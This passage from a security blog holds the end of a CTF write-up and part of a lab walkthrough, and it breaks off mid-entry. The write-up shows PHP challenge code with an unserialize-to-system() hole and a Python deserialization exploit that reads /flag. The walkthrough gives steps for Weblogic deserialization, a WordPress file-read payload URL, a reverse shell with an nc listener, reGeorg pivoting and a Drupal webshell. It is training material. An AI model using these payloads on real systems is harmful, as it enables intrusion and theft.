</span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"finish"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_TellMeTruth</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>])) </span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"似乎这个 "</span>.<span class="variable">$_SESSION</span>[<span class="string">'name'</span>].<span class="string">" 是真相<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"似乎这个 "</span>.<span class="variable">$_SESSION</span>[<span class="string">'name'</span>].<span class="string">" 是真相<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Command</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"看看你干的好事: <span class="subst">{$cmd}</span> <br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_unser_finished</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"cmd"</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$is_unser_finished</span> === <span class="literal">true</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"看看你干的 [<span style='color:red'><span class="subst">{$cmd}</span></span>] 弄出了什么后果: "</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<span style='color:blue'>"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</span>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">randstr</span>(<span class="params"><span class="variable">$len</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$characters</span> = <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_='</span>;</span><br><span class="line"> <span class="variable">$randstring</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$len</span>; <span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$randstring</span> .= <span class="variable">$characters</span>[<span class="title function_ invoke__">rand</span>(<span class="number">0</span>, <span class="title function_ invoke__">strlen</span>(<span class="variable">$characters</span>))];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$randstring</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$s</span></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$s</span>, <span class="string">"*"</span>) !== <span class="literal">FALSE</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">finalize</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>);</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$iscc_file</span>);</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"finish"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src='whichisthetrueiscc.gif'><br>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'whatareyounongshane'</span>])) {</span><br><span class="line"> <span class="variable">$whatareyounongshane</span> = <span class="variable">$_GET</span>[<span class="string">'whatareyounongshane'</span>];</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$whatareyounongshane</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"src"</span>:</span><br><span class="line"> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"cmd"</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"想越级干好事?还是有门的……"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /?%3f=O:12:"ISCC_Command":0:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"reset"</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"几辈子积累的好运就在这时~:p"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"upload"</span>:</span><br><span class="line"> <span class="variable">$resp</span> = <span class="string"><<<EOF</span></span><br><span class="line"><span class="string"><form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data"></span></span><br><span class="line"><span class="string"> <input type="file" name="iscc_file"></span></span><br><span class="line"><span class="string"> <input type="submit" value="Upload Image" name="submit"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">EOF</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$resp</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"tellmetruth"</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="title function_ invoke__">base64_decode</span>(<span class="string">"PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg=="</span>);</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"空空如也就是我!"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"所以哪个ISCC是真的?<br>"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'?'</span>])) {</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$wtf</span> = <span class="title function_ invoke__">waf</span>(<span class="variable">$_GET</span>{<span class="string">'?'</span>}) ? <span class="variable">$_GET</span>[<span class="string">'?'</span>] : (<span class="title function_ invoke__">finalize</span>() && <span class="keyword">die</span>(<span class="string">"试试就“逝世”!"</span>));</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$goodshit</span> = @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$wtf</span>)) {</span><br><span class="line"> <span class="variable">$is_unser_finished</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$status</span>, <span class="keyword">array</span>(<span class="string">'new'</span>, <span class="string">'cmd'</span>, <span class="string">'upload_ok'</span>, <span class="string">'upload_fail'</span>, <span class="string">'reset'</span>), <span class="literal">true</span>))</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"所以哪个ISCC是真的?<br>"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><head></span><br><span class="line"><title>ISCC finder system - which is the <span class="literal">true</span> ISCC</title></span><br><span class="line"><meta charset=<span class="string">"UTF-8"</span>></span><br><span class="line"><style></span><br><span class="line">* {</span><br><span class="line"> margin: <span class="number">0</span>;</span><br><span class="line"> padding: <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">canvas {</span><br><span class="line"> display: block;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#snowfall {</span></span><br><span class="line"> width: <span class="number">100</span>%;</span><br><span class="line"> height: <span class="number">100</span>vh;</span><br><span class="line"> background: cornflowerblue;</span><br><span class="line">}</span><br><span class="line"></style></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"></span><br><span class="line"><!--</span><br><span class="line">████████████▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒████████████▒▒</span><br><span class="line">████████████▒▒▒▒████████████████▒▒▒▒▒▒▒▒▒▒▒▒██████████████████▒▒▒▒▒▒▒▒██████████████████</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒██</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒██</span><br><span class="line">████████████▒▒██████████████████▒▒▒▒▒▒▒▒▒▒▒▒██████████████████▒▒▒▒▒▒▒▒██████████████████</span><br><span class="line">████████████▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒</span><br><span class="line">--></span><br><span class="line"><script src=<span class="string">"//cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"</span>></script></span><br><span class="line"><div id=<span class="string">"snowfall"</span>></div></span><br><span class="line"><script></span><br><span class="line"><span class="title function_ invoke__">particlesJS</span>(<span class="string">"snowfall"</span>, {</span><br><span class="line"> <span class="string">"particles"</span>: {</span><br><span class="line"> <span class="string">"number"</span>: {</span><br><span class="line"> <span class="string">"value"</span>: <span class="number">100</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"shape"</span>: {</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"circle"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"size"</span>: {</span><br><span class="line"> <span class="string">"value"</span>: <span class="number">10</span>,</span><br><span class="line"> <span class="string">"random"</span>: <span class="literal">true</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"line_linked"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"move"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"speed"</span>: <span class="number">2</span>,</span><br><span class="line"> <span class="string">"direction"</span>: <span class="string">"bottom"</span>,</span><br><span class="line"> <span class="string">"straight"</span>: <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> <span class="string">"interactivity"</span>: {</span><br><span class="line"> <span class="string">"detect_on"</span>: <span class="string">"canvas"</span>,</span><br><span class="line"> <span class="string">"events"</span>: {</span><br><span class="line"> <span class="string">"onhover"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> <span class="string">"modes"</span>: {</span><br><span class="line"> <span class="string">"push"</span>: {</span><br><span class="line"> <span class="string">"particles_nb"</span>: <span class="number">12</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></script></span><br><span class="line"><!--</span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=src"</span>>我真的是源码?</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=cmd"</span>>干点好事!</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=upload"</span>>送点东西!</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=tellmetruth"</span>>快告诉我真相!</a></span><br><span class="line">--></span><br><span class="line"></body> </span><br><span class="line">所以哪个ISCC是真的?</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">"http://39.96.91.106:7050/"</span></span><br><span class="line"></span><br><span class="line">files={</span><br><span class="line"> <span class="string">'iscc_file'</span>:(<span class="string">"b"</span>,<span class="built_in">open</span>(<span class="string">"1.png"</span>,<span class="string">"rb"</span>)),</span><br><span class="line"> <span class="string">"_SESSION"</span>:(<span class="string">"isccIsCciScc1scc"</span>,<span class="string">"hello"</span>)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">r=requests.post(url=url+<span class="string">"??=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A1%3A%22a%22%3BO%3A13%3A%22ISCC_ReSetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A1%3A%22b%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D"</span>,files=files)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF </category>
</categories>
<tags>
<tag> CTF </tag>
</tags>
</entry>
<entry>
<title>企业渗透2</title>
<link href="/2021/05/03/%E6%B8%97%E9%80%8F2/"/>
<url>/2021/05/03/%E6%B8%97%E9%80%8F2/</url>
<content type="html"><![CDATA[<h3 id="实验描述"><a href="#实验描述" class="headerlink" title="实验描述"></a>实验描述</h3><p>操作机的操作系统是kali 进入系统后默认是命令行界面 输入startx命令即可打开图形界面。</p><p>所有需要用到的信息和工具都放在了/home/Hack 目录下。</p><p>本实验的任务是通过外网的两个主机通过代理渗透到内网的两个主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h3><p>Weblogic的java反序列漏洞应用<br>Wordpress任意文件读取的漏洞利用<br>Wordpress命令执行的漏洞利用<br>WordPress通过自己修改的EXP,getshell<br>通过代理扫描内网<br>Redis未授权访问以及对配置文件的理解<br>Ffmpeg任意文件的读取结合redis的利用<br>Drupal由于YAML解析器处理不当导致远程代码执行</p><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>Kali Linux</td><td>192.168.2.10</td><td>操作机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.2.11</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.1.10</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.1.11</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.2.200</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr></tbody></table><h3 id="任务一-Weblogic反序列化"><a href="#任务一-Weblogic反序列化" class="headerlink" title="任务一 Weblogic反序列化"></a>任务一 Weblogic反序列化</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">整体扫描外部网络,探测暴露在外部的主机信息</span><br><span class="line">利用java反序列化漏洞利用脚本执行系统命令。</span><br></pre></td></tr></table></figure><p>实验目的</p><p>通过完成本实验任务,要求学生掌握利用java反序列化漏洞利用脚本攻击weblogic服务的技术。掌握weblogic服务的常见端口,启动jar程序的方法和攻击weblogic的流程、方法和技巧,为完成后续企业渗透实验任务奠定坚实的漏洞利用技术基础。</p><p>打开kal操作机</p><p>访问192.168.2.10:7001</p><img src="https://i.loli.net/2021/05/11/8Or6FDo15R3dEy4.png" alt="image-20210511164542470" style="zoom:67%;" /><p>打开home/HACK目录下的工具</p><img src="https://i.loli.net/2021/05/11/5M1iF9b6wA47XfT.png" alt="image-20210511164750762" style="zoom:67%;" /><img src="https://i.loli.net/2021/05/11/hWqTXOIlcetrGs1.png" alt="image-20210511165117929" style="zoom:67%;" /><p>输入HOST、端口、以及CMD命令</p><img src="https://i.loli.net/2021/05/11/VfiAsMBd74ZwgqL.png" alt="image-20210511165325031" style="zoom:67%;" /><p>点击connect并执行</p><p>根据提示,找到/home/flag下的flag.txt文件</p><img src="https://i.loli.net/2021/05/11/5VsN8uqYGF6pomC.png" alt="image-20210511165712024" style="zoom:67%;" /><h3 id="任务二-Wordpress任意文件读取"><a href="#任务二-Wordpress任意文件读取" class="headerlink" title="任务二 Wordpress任意文件读取"></a>任务二 Wordpress任意文件读取</h3><p>任务内容:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">使用wpscan工具扫描wordpress的插件漏洞</span><br><span class="line">主要针对插件WP Hide Security Enhancer存在的任意文件读取漏洞,以此读取到网站主要文件。</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/11/ieEOhInjoWZ9B2Y.png" alt="image-20210511170357840"></p><p>利用wpscan扫描wordpress网站,扫描漏洞插件</p><p>命令:wpscan –url 192.168.2.11 –enumerate p</p><img src="https://i.loli.net/2021/05/11/HxuqNEsvwgU6IMG.png" alt="image-20210511170541006" style="zoom:67%;" /><p>发现插件存在漏洞</p><p>根据提示直接上payload</p><p><a href="http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.ph">http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.ph</a> p?action=style-clean&file_path=/wp-config.php</p><p>得到flag</p><p><img src="https://i.loli.net/2021/05/11/tpTsrgoiRYGIHC2.png" alt="image-20210511170853149"></p><h3 id="任务三-Wordpress命令执行"><a href="#任务三-Wordpress命令执行" class="headerlink" title="任务三 Wordpress命令执行"></a>任务三 Wordpress命令执行</h3><p>任务内容:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用Burpsuite的repeater模块修改包探测漏洞存在的字段。</span><br><span class="line">执行wordpress mailer命令执行漏洞的利用脚本尝试获取shell。</span><br></pre></td></tr></table></figure><p>操作步骤</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">访问目标网站,在浏览器中配置代理,用Burpsuite拦截请求包</span><br><span class="line">使用Burpsuite的repeater模块探测漏洞字段。</span><br><span class="line">理解wordpress mailer漏洞的原理,执行wp.sh 脚本获取响应 信息</span><br></pre></td></tr></table></figure><p>首先找到登陆入口</p><img src="https://i.loli.net/2021/05/11/ABFOiVKzjkr4a5q.png" alt="image-20210511171155980" style="zoom:67%;" /><p>对firefox及burpsuite设置代理,拦截请求。</p><p><img src="https://i.loli.net/2021/05/11/C8fGIgnPWyF97i6.png" alt="image-20210511171245109"></p><p><img src="https://i.loli.net/2021/05/11/nDBkXY4lsSg3aiJ.png" alt="image-20210511171408750"></p><p><img src="https://i.loli.net/2021/05/11/HK5n8zt7UhfCONd.png" alt="image-20210511171428356"></p><p>利用提供的脚本getshell,获得flag</p><h3 id="任务四-改进漏洞利用脚本获得命令执行权限"><a href="#任务四-改进漏洞利用脚本获得命令执行权限" class="headerlink" title="任务四 改进漏洞利用脚本获得命令执行权限"></a>任务四 改进漏洞利用脚本获得命令执行权限</h3><p>实验目标</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。</span><br><span class="line">熟悉sendmail命令语法。</span><br><span class="line">掌握webshell命令执行漏洞的常规下载执行的利用思路。</span><br><span class="line">掌握在浏览器上配置代理的方法。</span><br><span class="line">掌握利用Burpsuite的repeater模块改包测试的过程。</span><br></pre></td></tr></table></figure><p>实验步骤</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">查看漏洞利用脚本wordpress-rce-exploit.sh理解脚本改进的原理。</span><br><span class="line">填写漏洞利用脚本的关键信息如反弹IP,监听端口等。本地监听设置的端口获取反弹的shell。</span><br><span class="line">利用shell上传regeorg的tunnel.php文件,使用regeorg架设代理</span><br><span class="line">通过proxychains设置好regeorg的代理,利用这个代理扫描内网1.0网段</span><br></pre></td></tr></table></figure><img src="https://i.loli.net/2021/05/11/GJUg7vFEZTt4Ds8.png" alt="image-20210511180514611" style="zoom:67%;" /><p>首先查看脚本内容</p><p>修改recv_host=”192.168.2.200”</p><p>设置监听端口</p><p>nc –lvvp 7777</p><p>反弹shell</p><h3 id="任务五-redis未授权访问-ffmpeg-任意文件读取"><a href="#任务五-redis未授权访问-ffmpeg-任意文件读取" class="headerlink" title="任务五 redis未授权访问+ffmpeg 任意文件读取"></a>任务五 redis未授权访问+ffmpeg 任意文件读取</h3><p>任务内容:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查看网页中的信息可知,是通过ffmpeg处理视频的小应用,只有上传,下载和删除功能,此处存在ffmpeg文件读取漏洞,构造特定的avi视频,经过ffmpeg处理之后的视频就会包含想要的文件内容。利用文件读取漏洞获取redis配置文件内容。</span><br><span class="line">redis数据库服务,允许外连且没有设置密码,可以随意访问,此处存在未授权访问漏洞,正常情况下可以写入文件,但是过程中发现,必要的config命令被替换了。而config命令的替换一定是写在redis的配置文件中的,配置文件的路径又可以在redis中执行info获取到。在以上环境中获取到redis服务器的shell。</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/11/1DOPUupfoXK9gmw.png" alt="image-20210511192133312"></p><h3 id="任务六-drupal8远程代码执行"><a href="#任务六-drupal8远程代码执行" class="headerlink" title="任务六 drupal8远程代码执行"></a>任务六 drupal8远程代码执行</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">使用浏览器挂代理访问内网机器192.168.1.10。</span><br><span class="line">利用drupal8的php反序列化漏洞向目标服务器写入webshell。</span><br><span class="line">使用Cknife连接已经生成的webshell</span><br></pre></td></tr></table></figure><p>实验目标</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。</span><br><span class="line">熟悉网站webshell的概念,理解上传webshell、获取webshell权限的意义和方法。</span><br><span class="line">掌握webshell工具Cknife的基本使用,特别是设置代理的功能,查看上传文件,命令执行等功能的使用。</span><br><span class="line">掌握在浏览器上配置代理的方法。</span><br><span class="line">掌握利用drupal8的php反序列化漏洞的攻击方法和相关的技术原理。</span><br></pre></td></tr></table></figure><p>操作步骤</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">使用浏览器结合proxychains用之前的代理访问内网中的drupal8的web应用。</span><br><span class="line">弱口令登录目标网站后台</span><br><span class="line">利用反序列化漏洞执行phpinfo 探测网站信息</span><br><span class="line">利用反序列化漏洞写入webshell,并测试存在</span><br><span class="line">用Cknife设置代理连接webshell获取网站的权限</span><br></pre></td></tr></table></figure><p><img 